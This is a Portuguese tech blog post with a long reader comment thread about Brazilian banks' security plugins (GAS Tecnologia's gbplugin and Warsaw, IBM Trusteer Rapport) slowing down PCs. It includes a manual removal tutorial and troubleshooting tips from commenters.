É malicioso. É malware. Se a GAS pelo menos desse uma alternativa de desinstalação rigorosa acessível para dono da máquina eu classificaria apenas como um software muito mal feito.

[29/06/2016]

Mais de um ano e meio depois e ainda estou encontrando problemas provocados pelo malware da GAS. Não é preciso que você tenha feito algum acesso ao BB para a máquina ficar lenta e os sintomas incluem:

  • Grande demora para abrir os navegadores;
  • Listas rolando em “câmera lenta”;
  • Leitor de código de barras funcionando como se você estivesse digitando caractere por caractere no teclado;
  • Google Maps com enorme dificuldade para traçar rotas;
  • Pausa exagerada ao clicar em links durante a navegação;
  • etc, etc, etc…
05 de setembro de 2014 | Tags: , , | Categorias: Sem categoria | %
206 comentários
  • luciano José da silveira - 18 Comentários
    05/09/2014 at 21:18 · Responder

    Uma dica para máquinas com Windows 8, utilize o aplicativo da Windows Store

    • Marcos - 1 Comentário
      11/04/2015 at 22:48 · Responder

      Tive o mesmo problema com este Warsaw 1.5.1.8886 da Gas tecnologia mas o meu caso foi mais grave meu endereço do bb foi direcionado para um site fantasma igualzinho do bb mas desconfiei porque deixo o site na janela de favoritos e ao clicar nele não funcionou. Fui ao chrome e digitei http://www.bb.com.br e fui direcionado para um site fantasma do bb desconfiei porque na barra usuario só tinha uma opção e ainda tinha um sinal de interrogação, devido minha desconfiança digitei uma agencia,cc e senha qualquer o site aceitou e pediu meus dados cadastrais. Minha desconfiança foi certa. Pesquisei e descobri que este arquivo foi instalado quando atualizei o sistema de segurança do bb chamado warsaw 1.5.1.8886 da gas tecnologia estava com mal intensão .tomem cuidado.Agora estou sem acesso ao bb. Obs:mesmo digitando o site normal do bb ele travava não respondia e só funcionava o falso.

      • Jefferson - 6.606 Comentários
        11/04/2015 at 23:30 · Responder

        Você está enganado. Os programas da Gas Tecnologia criam incontáveis problemas, mas jamais redirecionariam o acesso do BB para outro site. O objetivo deles é justamente protegê-lo disso.

        • Victor - 1 Comentário
          05/07/2015 at 11:40 · Responder

          Mesmo atualizando o Firefox para a versão mais recente (38.0.5), ele continua muito lento para abrir a página de login do Banco do Brasil. O Microsoft Internet Explorar abre essa página muito mais rápido.
          Tanto o Opera (navegador da minha preferência), quanto o Google Chrome, não funcionam com o BB.
          Victor
          05-07-2015

      • berninirobs - 1 Comentário
        24/04/2015 at 21:44 · Responder

        Oi Marcos.
        Eu estou tendo o mesmo problema de redirecionamento. Já formatei a maquina duas vezes mas não consigo me livrar do bicho. Tenho antivírus MacAffy versão a pagamento, o suporte entrou em remoto mexeu muito mas não achou nada. O suporte do BB confirmou a presença de um malware mas não soube sugerir uma solução se não de trocar a senha de 8 dígitos. Você conseguiu resolver de alguma forma? Obrigado.

        e-mail de contato: [removido pela moderação]

        • Edson Telasoc - 2 Comentários
          11/05/2015 at 11:14 · Responder

          Peguei um caso semelhante a esse semana passada e o que eu fiz foi mudar o servidor de DNS para os da google 8.8.8.8 e 8.8.4.4 foir resolvido assim pq eu acho que o virus estava mudando o dns e redirecionando para o site clonado e outra só deu pra perceber porque tinha uma mensagem do Reinaldo Gianiquini como propagando falando que o melhor é pegar o credito agora e só começar a pagar em 2013 começar a pagar a 2 anos atras????
          Bom esta aí.

          • Edson Telasco - 2 Comentários
            11/05/2015 at 11:15 · Responder

            O nome correto é Edson Telasco…..kkkk

          • Ronald Moura - 1 Comentário
            30/06/2015 at 0:28 · Responder

            Essa forma serviu para mim. Alterei o DNS para o do Google e funcionou. Sugiro adicionar o site nos favoritos. Também cai nesse site fantasma e tentaram duas vezes transferir meu dinheiro. O site fantasma usa fotos para enganar. Basta passar o mouse pela página e vai ver que não tem link nenhum.

            Valeu, galera!!!

        • Cid Alves Pinto Jr - 1 Comentário
          13/06/2015 at 16:20 · Responder

          Seu problema tem a ver com o DNS. Algum virus deve ter fixado um dns ou no roteador ou no modem. Acesse ambos e coloque o dns automático. Isto depois de remover o virus.

        • Thiago - 1 Comentário
          16/06/2015 at 0:01 · Responder

          Amigo esse problema está no seu modem ou roteador, basta vc resetar eles e reconfigurar q fica normal.

    • Hudson Barbosa - 1 Comentário
      11/08/2015 at 11:41 · Responder

      Olá Luciano , depois de tanto tempo encontrei seu post. Estou com um problema aqui na rede local e desconfio que é causado por este programa. Vc citou pra procurar na Windows Store, precisamente o que que temos de procurar ? Poderia explicar melhor ? Obrigado.

  • Alan - 1 Comentário
    05/09/2014 at 21:31 · Responder

    É o maldito gbplugin da uma olha cara ja tive problemas com isso.

    abraços

    • Jefferson - 6.606 Comentários
      05/09/2014 at 21:34 · Responder

      Sim, eu sei que é o gbplugin. Que eu saiba esse é o único “plugin de segurança” que o BB usa. Mas o que vou fazer? remover? A máquina não me pertence e o dono precisa usar o BB.

  • Daniel Plácido - 68 Comentários
    06/09/2014 at 10:49 · Responder

    Aqui a uns meses recebo maquinas com este sintoma elas tem o “trusteer rapport” para clientes do BRB, deixa qualquer maquina que seja [b]absurdamente[/b] lenta.

    Não consegui achar nenhuma solução, até pra desinstalar este plugin tem vezes que fica complicado, estou desinstalando e oriento o cliente a entrar em contato com o banco e informar o problema.

  • Marcos Costa - 3 Comentários
    06/09/2014 at 10:54 · Responder

    Se tem um câncer em forma de plugin é o Gbplugin do BB (que também é usado pelo CEF e Itaú, são feitos pela mesma empresa). Essa desgraça faz um hook a nivel de kernel e inicia com o sistema querendo ou não, e não descarrega da memória após o uso. Não possui desinstalador e só dá pra arrancar usando um live CD de Linux para acessar o disco por fora, deviam colocar essa porcaria na categoria de malware por sua inutilidade. Ah! Eles pregam que é por “segurança”, mas o phishing e os trojans continuam roubando tais senhas sem nenhum empecilho.

  • VR5 - 397 Comentários
    06/09/2014 at 22:57 · Responder

    Solução que uma empresa que nos presta suporte de informática nos apresentou: remova o gbplugin da máquina (e TODAS as referências a ele, todas as chaves de registro, etc.) e comece a usar bancos somente usando Firefox ou Chrome. APARENTEMENTE o problema é agravado com a combinação gbplugin + Internet Exlorer…

    • Jefferson - 6.606 Comentários
      07/09/2014 at 0:14 · Responder

      Isso é interessante. Eu precisaria apagar o Internet Explorer para garantir isso, mas há casos em que vale a pena tentar.

    • João Lobo - 1 Comentário
      17/11/2014 at 16:22 · Responder

      O problema ocorre no Chrome da mesma forma. Tenho clientes que conseguem se virar com o IE9, mas não podem usar o chrome. Quando usam o chrome para acessar o BB ou Itaú o micro só volta a operar normalmente após um shut down. Não é só a navegação web que fica lenta, é tudo.

  • Fernando - 1 Comentário
    24/09/2014 at 16:50 · Responder

    Não sou fã do Gbplugin e sempre que possível utilizo a versão Java do plugin, o santander oferecia esse recurso até dezembro do ano passado, e desde então fui obrigado a instalar essa praga no meu notebook, já para os outros bancos tem uma solução.

    Aqui onde trabalho estamos fazendo alguns testes para retirar o plugin das estações, e passar a utilizar só a versão java dos bancos que disponibilizam está opção para o linux, para isso basta mudar o User Agent do browser para um do firefox rodando no linux.

  • Márcio Amorim - 2 Comentários
    25/10/2014 at 10:58 · Responder

    Segue tutorial que fiz para resolver este problema.

    Aprenda como desinstalar completamente o G-Buster, plugin de segurança do Banco do Brasil (não sei se funciona para o plug-in G-Buster dos outros bancos) e ainda poder continuar acessando o site do banco com segurança, em 7 etapas.

    1 – Desinstale o Módulo de Segurança normalmente pelo próprio Windows.
    Iniciar -> Painel de Controle -> Programas e Recursos

    2 – Clique em Iniciar e digite na pesquisa:
    %temp% e tecle Enter
    Na tela que abriu, localize a pasta GAS Tecnologia e a exclua (delete)

    3 – Desligue o computador (clique em Desligar, e não em Reiniciar).
    Ligue novamente entrando em modo de segurança (tecle F8 repetidamente assim que ligar o computador e aguarde até aparecer o menu do modo de segurança)

    4 – Depois que o Windows iniciar em modo de segurança, abra o Windows Explorer e apague a pasta:
    Para Windows 32 bits – C:\Arquivos de Programas\GbPlugin
    Para Windows 64 bits – C:\Arquivos de Programas (x86)\GbPlugin

    5 – Ainda em modo de segurança, abra o Editor de Registro do Windows:
    Clique em Iniciar e digite na pesquisa:
    Regedit e tecle Enter

    Localize e exclua a sub-chave Security em
    HKEY_LOCAL_MACHINE\SYSYEM\CurrentControlSet\services\GbpSv

    Reinicie o Windows normalmente (não precisa ser em modo de segurança)

    6 – Abra o Prompt de Comando como Administrador
    Iniciar -> Todos os Programas -> Acessórios -> Prompt de Comando (clique com o botão direito do mouse e escolha Executar como administrador)

    No prompt de comando digite:
    SC DELETE GBPSV e tecle Enter
    Deverá aparecer uma mensagem de êxito

    Pronto! O processo/serviço já foi totalmente eliminado.
    Tecle Ctrl+Shift+Esc e verifique que o processo GbpSv.exe já não aparece mais.

    Agora vamos instalar o componente de segurança para poder usar o site do Banco do Brasil sem problemas.

    7 – Entre no site do Banco do Brasil usando o Firefox (deve dar certo com o Chrome também, mas prefiro e uso o Firefox) e clique para instalar o módulo de segurança.

    Na próxima tela, presta atenção:
    Não clique na opção padrão de instalação do Módulo de Segurança BB
    Clique em AQUI, no canto direito do texto.

    Faça o download do stormfish.exe e depois instale aceitando todas as opções que forem sendo oferecidas.
    Pronto!
    O componente de segurança foi instalado e você já pode acessar o site do Banco do Brasil sem nenhum problema.

    Tecle Ctrl+Shift+Esc e verifique que o processo GbpSv.exe continua não existindo mais.

    Espero ter ajudado.

    Att,

    Márcio

    • Daniel Zattera Sganzerla - 1 Comentário
      28/11/2014 at 9:44 · Responder

      Cara, salvou a minha vida!
      Obrigado, deu muito certo!

    • Carlos Henrique - 1 Comentário
      19/12/2014 at 14:19 · Responder

      Olá Márcio Amorim, venho te agradecer pela dica que resolveu meu problema, já tinha formatado e instalado novamente varias vezes. Sou muito grato pela sua colaboração.

    • José Luiz Tosini - 1 Comentário
      13/01/2015 at 11:34 · Responder

      Parabéns Marcio. Matou a pau.
      Agilizou sensivelmente minha máquina.

    • Marco - 1 Comentário
      18/04/2015 at 20:07 · Responder

      Sensacional, Márcio! Funcionou belezinha pra mim.
      Enquanto fazia os passos, acabei instalando o app do BB no meu Android.
      Sempre fui medroso com relação a isso, mas me rendi depois de tanto problema com o BB no pc. O app tem funcionado ok.

    • Fabio Nappi - 1 Comentário
      23/04/2015 at 12:34 · Responder

      Olá Marcio, Preciso de sua ajuda, com seu ótimo tutorial consegui remover essa porcaria de GBplugin e Warsaw tb, mesmo usando win 8.1 64bits, porém preciso que vc me ajuda numa situação, mesmo após ter removido tudo isso da máquina, e etc… minha rede interna ainda permanece bloqueada, não consigo acessar o servidor da empresa, nem os compartilhamentos na rede, e isso aconteceu após a instalação dessas porcarias de plug-ins, pesquisei na internet, e vi que isso era sintoma tb causado por esses plug-ins você por acaso sabe como resolver? abraços.

    • Edu - 1 Comentário
      07/05/2015 at 12:13 · Responder

      Remotamente é mais difícil. Rebootei em safemode no Teamviewer , renomei os diretórios das desgraças e reboot normal… voila

    • Renilson - 1 Comentário
      14/05/2015 at 11:43 · Responder

      Parabéns Márcio. Funcionou perfeitamente. Apenas o processo de istalação do Stormfish que está um pouco diferente, mas nada que atrapalhe o processo. Você deveria dar suporte ao pessoal de suporte do BB. ;)
      Abraços.

    • Waldir - 1 Comentário
      24/06/2015 at 15:19 · Responder

      Marcio na minha máquina não consigo remover a pasta pelo windows explorer em modo de segurança, nem no prompt de comando SC DELETE GBPSV funcionou, como devo fazer? Obrigado

      • Marcio - 2 Comentários
        25/06/2015 at 8:45 · Responder

        Bom dia, Waldir! Em modo de segurança vc deveria conseguir remover a pasta. Já que não está conseguindo, tente baixar o aplicativo Unlocker. Ele consegue desbloquear arquivos e pastas para que sejam apagadas. Mesmo que ele não consiga de imediato, vc pode escolher a opção de apagar as pastas/arquivo assim que o computador for reiniciado.

        Um link confiável para download é este: http://filehippo.com/download_unlocker/

        Espero que consiga resolver.

        Abç!!

    • Raphael Ventorim - 1 Comentário
      21/07/2015 at 22:04 · Responder

      Boa noite Marcio, estava usando sua dica porém de uns dias pra cá a página parou de abrir novamente informando problemas de instalação do módulo de segurança – GBBD001. O que pode ser dessa vez? Notei que isso também aconteceu no computador do meu irmão, então parece um problema mais generalizado! Obrigado pela atenção!

    • paulo rocha - 1 Comentário
      31/07/2015 at 23:03 · Responder

      Valeu mesmo!!!
      O Senhor te cubra de muitas dádivas.

    • Carla - 1 Comentário
      29/06/2016 at 10:23 · Responder

      valei Márcio,foi de grande ajuda seu tutorial, resolveu meu problema hj dia 28/06/16. Muito obrigada..abraços :)

    • Adalberto Tavares - 1 Comentário
      31/07/2016 at 23:15 · Responder

      -Valeu amigo, usei esse passo a passa agora em julho de 2016, para installar o modulo de segurança do Banco do Brasil e deu certo.

    • Walter - 2 Comentários
      30/12/2016 at 8:42 · Responder

      Bela dica. Sabe se tem um método semelhante para a CEF?

      Recentemente eu instalei um novo W7 (limpinho das pragas) e um segundo em dual boot só pros bancos, mas resolvi instalar uma máquina virtual para simplificar. A CEF eu acessei normalmente mas o BB simplesmente bloqueou minha senha de internet, coisa que nunca me aconteceu em mais de 10 anos. Sabem se pode ser incompatibilidade com a MV ou o Windows XP que instalei nela?

  • Nelson André Hofer de Carvalho - 1 Comentário
    13/11/2014 at 12:11 · Responder

    Prezados,
    Só para contribuir com uma informação.
    Eu uso esta porcaria de plugin (BB, CEF e Santander). Ocorre que o do BB por duas vezes deu erro de erro de acesso por problemas na chave ‘J’. O BB pediu para eu formatar a máquina. Piada ! Só pode ser piada. Depois de algumas tentativas, consegui fazer o acesso ao internet banking do BB. O interessante é que o site da CEF e Santander não deram problema.
    De qualquer sorte, peço que atentem para o uso do programa Avast Browser Cleanup.
    Ao usá-lo é que ocorreu o erro. Notei durante o processamento deste software, que ele atua sobre o plugin. Não sei a razão de ele detonar só o BB. Infelizmente o Banco não te dá qualquer ajuda. só fala em formatar o HD.

    • Jefferson - 6.606 Comentários
      28/02/2015 at 1:29 · Responder

      Essa costuma ser mesmo a “solução” padrão do suporte do BB: formatar a máquina. Uma piada de muito mau gosto. Sempre consegui resolver sem formatar.

  • Evandro - 1 Comentário
    14/11/2014 at 14:49 · Responder

    Também venho sofrendo com estes problemas com micros de clientes.
    No passo 2 acrescente %localappdata%
    E apague a pasta GAS Tecnologia de lá também.
    Obrigado por compartilhar sua experiência.

  • Jefferson - 6.606 Comentários
    17/11/2014 at 16:32 · Responder

    Eu testemunhei outro problema causado pelo malware da GAS com um cliente. Aparentemente o plugin tenta checar com uma base de dados online TODOS os acessos feitos pelo usuário, incluindo CADA CLIQUE que ele dá em uma página.

    Eu notei isso porque o cliente ficou sem acesso à internet e minha tentativa de acessar a configuração do modem era atrapalhada pelo plugin. Cada clique que eu dava acarretava uma espera de alguns segundos depois da qual o Firefox avisava que o plugin do Banco do Brasil havia parado de responder. O danado do malware da GAS, na versão instalada nessa máquina, era palerma demais para reconhecer um endereço IP da faixa privada (no caso, 192.168.0.x).

    Isso significa que se você tiver um acesso já lento ou o servidor que o malware usa estiver demorando a responder, tudo vai demorar mais.

    Fora o problema de privacidade. Cada página que você visita é comunicada ao servidor da GAS/BB. E como o malware da GAS é uma total caixa preta você não tem sequer uma declaração de privacidade da GAS/BB dizendo o que é feito com essa informação.

  • Rock Carvalho - 2 Comentários
    09/12/2014 at 16:04 · Responder

    Cara, estou enfrentando o mesmo problema com o gbplugin… porém meu anti-virus é o ad-aware.
    Problemas de lentidão tanto no chrome, quanto no firefox. IE, não uso pois é o pior deles.

    Relatando só para acompanhar….
    Abraço

  • Daniel - 29 Comentários
    15/12/2014 at 9:14 · Responder

    Bom dia,

    E o novo plugin do Banco do Brasil? IBM/Trusteer – rapport https://seg.bb.com.br/rapport.html

    Será que é melhor que o antigo, ou teremos que conviver com os dois na mesma máquina?

    Ao logar no banco recebi a mensagem que fui escolhido para participar de um teste beta. Resolvi deixar para instalar depois esperar ficar mais maduro o sistema.

    Alguém que segue este blog já instalou? Já teve algum problema?

    []s Daniel
    http://www.neoage.com.br

    • VR5 - 397 Comentários
      15/12/2014 at 9:51 · Responder

      Aqui no RS o Banrisul (o banco estadual) já usa. Temos em 2 máquinas instaladas e, aparentemente, não afeta o desempenho delas.

  • Guilherme Andrade - 1 Comentário
    16/12/2014 at 9:01 · Responder

    Eu desinstalei os plugins do Chrome e do Firefox. Só uso o IE para acessar os bancos. Parece que o problema desapareceu. Instalei hoje o Truster Rapport do BB. Vamos acompanhar para ver se tem impacto.

  • Ricardo - 1 Comentário
    16/12/2014 at 12:43 · Responder

    Eu consegui instalar com uma maneira bem simples para usar no Chrome:
    -> Instalar somente o Stormfish.
    -> Procurar na Google Store o app do BB.

    Mas levando em conta que “não sabemos o que ele faz”, eu recomendo instalar uma máquina virtual e meter o windows lá e usar ela só para acessar o banco. É mais seguro do ponto de vista que ninguém vai usar o windows da máquina virtual pra mais nada, e o maldito não vai cuidar da sua vida.

    Para quem tem clientes que reclamam que não dão conta, tentem criar um script de inicialização na instalação da vm que já abre o navegador na página do banco com comando call, que quando o cara fechar o navegador, o script desliga a VM, ou algo assim.

  • Luis Pessoa - 1 Comentário
    16/12/2014 at 15:18 · Responder

    Parece que o plugin do BB deixa o micro (não só a navegação) lento e agora está provocando problemas na navegação de outros sites (google plus por exemplo, que os botões não funcionam com o plugin ativado).

    Fiz o seguinte: só uso no IE. Quando termino o acesso do bb, fecho o navegador. No firefox ele fica desativado. Parece que diminui o “efeito carroça”. Recebi hoje tb o convite para o Rapport, mas prefiro esperar um pouco mais.

    Abri um case no Mozilla e vou postar esta thread para o pessoal já ir tomando conhecimento.

  • antonio - 4 Comentários
    22/12/2014 at 21:11 · Responder

    instalei o rapport a pedido do bb.
    tenho o rapport e o gb plugin da gas.(imaginem)
    o pessoal do rapport(trusteer ibm) informou que ele não é compatível com o gb plugin.
    mas o bb e os outros bancos continuam solicitando a instalação do módulo de segurança da gas.
    só mesmo no brasil podemos conviver com uma salada destas.
    porque então o banco do brasil pede a instalação do rapport e não dá uma solução para o gbplugin???????????

    os computadores viraram carroças com travamentos e freio de mão puxado..

  • antonio - 4 Comentários
    22/12/2014 at 21:39 · Responder

    o usuário brasileiro que acessa vários bancos se vê na seguinte situação:

    1-se acessa bb tem que instalar o módulo de proteção do bb(gás).
    agora foi oferecido também o rapport (ibm)que não é compatível com o módulo de proteção da gas.então como foi oferecido?

    2.se acessa Santander tem que instalar o módulo de proteção Santander (gás).

    3-se acessa caixa tem que instalar o módulo de proteção da caixa (gás).

    4-se acessa itau tem que instalar o modulo de proteção itau e ainda o novo e maldito warsaw.exe (todos da gás).

    o serviço gbpsv da gás concentra todos os módulos de proteção dos bancos.

    agora vocês analisem se o cara tem que acessar todos esses bancos.
    eu tirei tudo do itau porque não acesso mais.mas tem um driver do warsaw que não sai nem com decreto.ele reinstala toda hora.

    o que fazer??????????????????

  • antonio - 4 Comentários
    22/12/2014 at 21:55 · Responder

    vou dar uma sugestão aos amigos do site:

    1-deixem só o ie para acessar os bancos.acredito que ele seja o melhor para isso.
    em compensação é o que mais sofre com os complementos da gás.trava de tudo o que é jeito e atualmente no meu pc(com rapport junto )perde até a conexão com a internet,
    tem que reiniciar o navegador para acessar de novo(vejo isso nos e-mails e o Firefox continua conectado).o ie fica perdido como navegador.

    2-não acessem os bancos com o Firefox ou o chrome e naveguem com eles.

    win 8.1 single com ie11

    talvez seja o melhor.ou então ter um pc só para acessar a praga dos bancos.

  • Fabiano - 1 Comentário
    26/12/2014 at 10:34 · Responder

    Meu Chrome apenas demora pra carregar o pluguin do BB toda vez que inicio o browser, mas mesmo assim irrita demais. Pra mim começou a aparecer a oferta de uma nova tecnologia:

    http://www.bb.com.br/portalbb/page3,105,500755,0,0,1,1.bb?codigoMenu=435&codigoNoticia=43496&codigoRet=20038&bread=6

    Nova Solução de Segurança

    Estamos constantemente investindo para aprimorar nossos sistemas e aumentar, ainda mais, a sua segurança.

    Nesse sentido, estamos iniciando a oferta de uma nova solução de segurança para acesso à sua conta via Autoatendimento BB pela Internet (pessoa física). Esse processo ocorrerá de forma gradativa. Se você for selecionado, deverá efetuar o download do produto Rapport – Proteção de Terminal. A instalação é simples e rápida. Senhas não são solicitadas em nenhum momento, mas é necessário ser administrador do equipamento em que a solução será instalada.

    Se você já recebeu a oferta, mas não realizou o download, poderá fazê-lo seguindo as orientações disponíveis clicando aqui.

    Caso você não tenha recebido a oferta mas também queira utilizar a nova solução, basta clicar no mesmo link indicado acima.

  • Gustavo Moreira - 1 Comentário
    02/01/2015 at 16:30 · Responder

    O Plugin de Segurança do Bando do Brasil simplesmente transformou meu DEL XPS em uma carroça.
    O plugin monitora tudo e como não posso ficar sem o Banco sou obrigado a usar isso.
    Vou ter que comprar outro PC porque é impossível trabalhar com uma máquina tão lenta.

  • VR5 - 397 Comentários
    05/01/2015 at 9:07 · Responder

    Sabem a solução (piada!)? Irmos fisicamente aos bancos, usarmos os caixas eletrônicos, etc. eheheh…

  • Junior - 1 Comentário
    08/01/2015 at 9:39 · Responder

    Bom dia galera!

    Utilizo o IE para acessar os bancos Banrisul, Itaú e Bradesco, e notei que meu PC perdeu desempenho(e muito) depois que instalei o tal truster da IBM, mas inicialmente achei que era a máquina com problema, e como eu precisava de outra máquina acabei comprando um I3 com 4G, que é uma ótima máquina com desempenho excelente pro que eu precisava, porém inventei de isar esse novo note pra acessar os bancos, xiiiii…ficou uma carroça!
    Vou ficar acompanhando até aparecer uma solução definitiva.

    Um abraço a todos!

  • Diego Reis - 1 Comentário
    08/01/2015 at 10:51 · Responder

    Esse novo plugin que eles estão disponibilizando é outra porcaria!!!!

    Tenho um i7 12GB que esta travando… imagina quem tem celeron?

    ainda bem que a empresa ta alterando de BB pra Itau!!! :rtfm:

  • Walter Luiz - 2 Comentários
    09/01/2015 at 0:04 · Responder

    Parei de usar o internet explorer há muito tempo, tanto no PC,quanto no notebook. Só tenho conta no BB e na Caixa, e sempre acesso através do Firefox, e não tenho tido problemas de “efeito carroça”. Hoje apareceu o pedido de instalação do Rapport, mas não senti firmeza quando li o “contrato”, e não instalei. Fico na dúvida quanto à movimentação por celular e tablet, que não é solicitada a instalação de nenhum plugin. Onde está a segurança nesses casos?

    • Walter Luiz - 2 Comentários
      09/01/2015 at 0:22 · Responder

      Imagino que os próprios aplicativos do BB e da Caixa já sejam os plugins, mas como verificar a autenticidade?

  • ROSSI - 1 Comentário
    12/01/2015 at 10:26 · Responder

    Tenho a melhor solução.
    Use o Firefox para entrar. Mas antes vá na aba de complementos do firefox e selecione a opção de (perguntar antes de ativar) o pluggin do Banco do brasil.
    Quando for se logar, o firefox vai lhe perguntar se pode ativar o pluggin.
    Pronto é só autorizar e vc esta logado sem precisar instalar nada.

  • William - 1 Comentário
    16/01/2015 at 20:39 · Responder

    Eu instalei o Rapport para acesso ao BB. No meu caso uso o Firefox e gera o “efeito carroça”. Resolvi isso da seguinte forma:

    Coloquei na “barra de início rápido” os ícones de “Iniciar” e “Encerrar Trusteer Endpoint Protection”.

    Dessa forma APENAS quando vou acessar o BB eu Inicio o “Traste” (gerando o efeito carroção) e quando eu saio do gerenciador eu o Encerro, deixando assim, o micro normal novamente.

  • Wladimir Vergal - 1 Comentário
    19/01/2015 at 10:11 · Responder

    Eu também cai na mesma situação do William, por sorte. :yahoo: Coloquei Trusteer na procura do Iniciar, e apareceram esses dois ícones.
    Vou orientar os dois clientes e usa-los. Detalhe: Na parada é pedida uma confirmação “Captcha”

    Para o (maldito) GPplugin vi uma dica noutro site e já consegui usar uma vez, segue um resumo:
    Encontra o executável, para o serviço e rapidamente apaga ele. Nem toda máquina dá tempo, mas quando consegue, dá certo e é muito mais simples !

  • Ronan - 1 Comentário
    19/01/2015 at 11:26 · Responder

    Usuário comum: Vá até a barra de ferramentas, dê dois cliques no ícone do rapport e desligue-o. Depois configure seu computador para NÃO iniciar o rapport junto com o sistema. Quando for utilizar o banco, inicie o rapport. Após utilizá-lo, desligue-o.
    Uso o rapport em um cpu com windows XP SP3 que tem só 2Gb de memória.
    Beijas!

  • antonio - 4 Comentários
    08/02/2015 at 17:53 · Responder

    fiz alguns comentários anteriores sobre os problemas dos módulos de proteção
    dos bancos.
    continuei pesquisando sobre os travamentos do ie 11 e independente dos módulos de proteção o que melhorou muito os travamentos do ie11 no meu caso foi:
    em opções de internet>avançadas usar renderização por software em vez de renderização de gpu*.

    abraços

  • Jefferson - 6.606 Comentários
    12/02/2015 at 18:50 · Responder

    Mais uma máquina com problemas provocados pelo plugin. Estava tão lenta que até a lista de emails no Windows Live Mail rolava em câmera lenta. O cliente me colocou no caminho certo ao informar que o problema começou após instalar o plugin de segurança do BB. Dei boot por um LiveCD e removi tudo que encontrei da Gas Informatica (gbplugin e Warsaw). Com isso a máquina voltou imediatamente ao normal.

    Eu realmente gostaria de saber como o malware da GAS consegue deixar a máquina tão lenta sem que isso apareça em nenhum gerenciador de tarefas. As ferramentas dizem que a CPU e a RAM estão livres, mas a máquina é inútil.

    • VR5 - 397 Comentários
      13/02/2015 at 8:42 · Responder

      Pelo jeito essa GAS deve ter um “cambalacho” MUITO do rentável ($$$) com o governo pra eles reinarem soberanos nesse mercado (Operação Lava Jato neles?)…

      • Jefferson - 6.606 Comentários
        13/02/2015 at 14:00 · Responder

        Isso já começou a mudar. O BB já vem usando um software da IBM (Trusteer Rapport) como solução de segurança alternativa (instala inclusive no MAC OS). Porém mesmo para os clientes que instalaram o software da IBM no Windows a situação não deve mudar imediatamente porque a praga da GAS não é desinstalada automaticamente. Até mesmo porque outros bancos ainda fazem uso desse malware.

    • Saulo Benigno - 279 Comentários
      13/02/2015 at 14:11 · Responder

      Uma dúvida Jefferson, você desinstala do Cliente… e como ele fica? Não acessa mais o banco? Fica sem o acesso?

      • Jefferson - 6.606 Comentários
        13/02/2015 at 14:26 · Responder

        Eu desinstalo o plugin em dois casos:

        1)pessoas que *não precisam* acessar o banco naquela máquina específica. No caso que descrevi acima, a empresa tem um departamento financeiro e por uma razão que não me explicaram, usaram a máquina do Comercial para acessar o BB.

        2)Para demonstrar para o cliente que o problema é causado pelo acesso ao banco. Se ele quiser instalar novamente o malware da GAS apesar de minhas recomendações, a máquina é dele e o problema também.

        Geralmente o cliente tem a possibilidade de fazer suas transações por outra máquina ou via celular. E ainda temos a alternativa de criar uma máquina virtual só para acomodar acesso ao banco e assim conter o malware da GAS.

        • Saulo Benigno - 279 Comentários
          25/02/2015 at 9:42 · Responder

          Poxa, boa idéia essa da máquina virtual. Gostei.

          Mas pense que num negocio complicado esses plugins viu, deve rolar muita, muita, mas muita grana mesmo nisso.

          • Jefferson - 6.606 Comentários
            27/02/2015 at 2:31 · Responder

            Usar máquinas virtuais para isso é a solução padrão quando a máquina real tem condições de rodar uma e o cliente é suficientemente “letrado” para entender como funciona. Eu devo ter mencionado o uso do virtualbox para isso de passagem em outros posts. Eu tenho um cliente que usa máquina virtual exclusivamente para emitir boletos do BNB, porque não funciona de jeito nenhum em um browser que não seja o IE8 e o suporte do BNB é ridículo.

            • Richardson - 9 Comentários
              27/02/2015 at 8:30 · Responder

              É quase isso aqui o Banestes (ES). Dizem eles que passou a funcionar com qualquer browser, mas quando tentei não foi, só no IE, mas mesmo na versão 11 funciona.
              Java também está aceitando a última versão, milagre pois por muito, muito tempo ficou estagnado na versão 6.38 (qualquer outra diferente e a carga do certificado digital não funcionava).

  • Rodolfo - 1 Comentário
    13/02/2015 at 10:02 · Responder

    Há algum tempo me dei o trabalho (após a instalação das soluções de segurança da gas terem corrompido a inicialização do meu note) de procurar quem diabos era essa Gas Tecnologia.

    A treta é tão grande que de uma empresa furreca eles passaram a mega empresa com sede em Brasília.

    Envolvidos inclusive numa investigação do tribunal de contas sobre os gastos com sistema de cadastramento do cartão SUS, que custou a mais no estilo plataformas da Petrobrás.

    Praticamente não existe suporte ou esclarecimentos a respeito dos softwares deles e trabalham prioritariamente com os bancos estatais.

    • Marcia Chinelato - 2 Comentários
      24/02/2015 at 13:45 · Responder

      mmmmm Suspeito para dizer o mínimo, né? rsrs

    • Richardson - 9 Comentários
      24/02/2015 at 14:50 · Responder

      Essa Gas é a mesma se não me engano tinha o Gas Pro, um gerador de código fuleirinho, mas muito funcional na época do Clipper?
      Era do tipo, “legal, funciona bem”, mas todo mundo que conhecia um pouco mais de programação fazia seu próprio gerador muito melhor.

  • Samira - 1 Comentário
    19/02/2015 at 22:02 · Responder

    Eu também tive problemas mesmo tendo o avast como antivirus. E agora ia tentar usar o site do bb e estou desistindo pois, agora está pedindo pra fazer download de algum programa, mas como estou com medo de baixar pois perdi tudo que tinha no meu not pois incrivelmente ele também estava com virus por qual motivo não sei nem programa… O que devemos fazer pra poder acessar o site sem ter problemas com o PC…

    Agradeço desde já.

    • VR5 - 397 Comentários
      20/02/2015 at 6:56 · Responder

      Samira: por mais incrível (para não dizer ridículo/risível) que possa parecer a melhor solução (sem ter que apelar para soluções tipo “vá ao banco fisicamente” ou “use um caixa eletrônico”) é teres um computador “pelado”, somente com Windows e mais alguns programas acessórios, ele não estar em rede com sua empresa/escritório (somente com a internet) e usares ele somente para UM banco… cada banco usar um PC diferente nessa mesma condição. Sim, eu sei que é impossível, mas é isso!

  • Marcia Chinelato - 2 Comentários
    24/02/2015 at 13:43 · Responder

    Eu simplesmente odeio essa web do Banco do Brasil. Hoje por exemplo já tive que reiniciar a máquina porque essa bomba fica travando, avisando de um maldito script da página que eu nem sei se devo dizer sim ou não. Eu não entendo patavinas desses assuntos. É tudo um parto, mas trabalho com o Itaú, com o Bradesco e nenhum dá tantos problemas. Tb já trabalhei com o HSBC e Citibank. E nenhum é tão ferrado como essa &¨%$#@ do BB. :S

  • Richardson - 9 Comentários
    24/02/2015 at 13:55 · Responder

    Esse problema dos plugins de segurança abriram uma porta sobre o motivo de eu não conseguir mais utilizar o Windows 8.x no meu notebook i3 HP G42 321BR.

    Originalmente o 7, bem rápido na época em que comprei, mas há muito tempo mais lento do que era, mesmo após uma restauração limpa.
